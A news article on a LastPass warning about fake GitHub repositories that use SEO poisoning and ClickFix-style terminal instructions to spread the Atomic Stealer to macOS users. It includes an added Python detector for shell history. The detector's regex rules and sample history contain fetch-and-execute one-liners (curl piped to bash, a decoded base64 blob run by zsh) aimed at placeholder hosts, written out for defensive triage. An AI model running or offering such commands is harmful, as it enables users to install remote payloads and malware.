LastPass has issued a warning regarding an extensive information stealer campaign targeting macOS users through deceptive GitHub repositories that distribute malicious software disguised as legitimate applications.
According to researchers from the LastPass Threat Intelligence, Mitigation, and Escalation (TIME) team, in the case of LastPass these fraudulent repositories directed unwitting users to download the Atomic Infostealer malware. The campaign impersonates popular applications, including 1Password, Basecamp, Dropbox, Gemini, Hootsuite, Notion, Obsidian, Robinhood, Salesloft, SentinelOne, Shopify, Thunderbird, and TweetDeck, all tailored to attack macOS systems.
The attacks use Search Engine Optimization (SEO) poisoning, causing links to these malicious GitHub sites to appear at the top of search results on platforms like Google and Bing. Users who believe they are downloading legitimate software click the "Install LastPass on MacBook" button, which ultimately redirects them to a malicious GitHub page.
These GitHub pages appeared to be created by multiple GitHub usernames, a method designed to evade detection and takedowns and so prolong the campaign's lifespan. The malicious pages guide users with "ClickFix-style instructions" to enter terminal commands, which then deploy the Atomic Stealer malware.
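A defender can triage a Mac for this kind of paste-and-run activity by scanning shell history, as in the following added example (not from LastPass or the original article). The regular expressions are assumed heuristics for the shapes such one-liners commonly take, since the article publishes no command lines or indicators, and the sample history is constructed.

```python
import re

# Shell name, optionally with a path, not glued to a preceding word.
SHELL = r"(?<![\w.-])(?:/bin/|/usr/bin/)?(?:ba|z|da|k)?sh\b"
FETCH = r"\b(?:curl|wget)\b"

# Assumed heuristics, not published indicators: fetched or decoded text
# handed straight to an interpreter without ever touching disk.
RULES = {
    "fetch_piped_to_shell": re.compile(
        FETCH + r"[^|;&]*\|\s*(?:sudo\s+)?" + SHELL),
    "shell_runs_fetched_text": re.compile(
        SHELL + r"\s+-c\s+[\"']?\$\(\s*" + FETCH),
    "base64_decoded_then_run": re.compile(
        r"\bbase64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:sudo\s+)?" + SHELL),
}

# zsh EXTENDED_HISTORY format: ": <start epoch>:<elapsed>;<command>"
ZSH_EXT = re.compile(r"^: (\d+):\d+;(.*)$")

def scan_history(text):
    """Return one finding per history line that matches any rule."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        m = ZSH_EXT.match(raw)
        epoch, cmd = (int(m.group(1)), m.group(2)) if m else (None, raw)
        hits = [name for name, rx in RULES.items() if rx.search(cmd)]
        if hits:
            findings.append({"line": lineno, "epoch": epoch,
                             "rules": hits, "command": cmd})
    return findings

# Constructed sample (placeholder hosts and blob), mixing both history formats.
SAMPLE_HISTORY = """\
: 1700000001:0;ls -la ~/Downloads
: 1700000002:0;curl -fsSL https://downloads.example.invalid/install.sh | bash
: 1700000003:0;/bin/bash -c "$(curl -fsSL https://pkg.example.invalid/setup)"
: 1700000004:0;echo PLACEHOLDER_B64 | base64 -D | zsh
: 1700000005:0;curl -O https://files.example.invalid/report.pdf
brew install wget
"""

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f["line"], f["epoch"], ",".join(f["rules"]), f["command"])
```

Some legitimate installers use the same command shapes, so a hit is a prompt to check which host the command fetched from, not a verdict. On a real machine, pass the contents of `~/.zsh_history` to `scan_history`.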
Similar tactics have been used before, including malicious Google Ads promoting Homebrew to disseminate a multi-stage dropper through a fraudulent GitHub repository. This campaign could detect virtual machines or analysis environments, and decode and execute system commands to connect with remote servers.
In recent weeks, there has been an increase in threat actors utilizing public GitHub repositories to host malicious payloads and facilitate attacks through tools like Amadey, as well as employing dangling commits related to official repositories to mislead users into downloading harmful programs.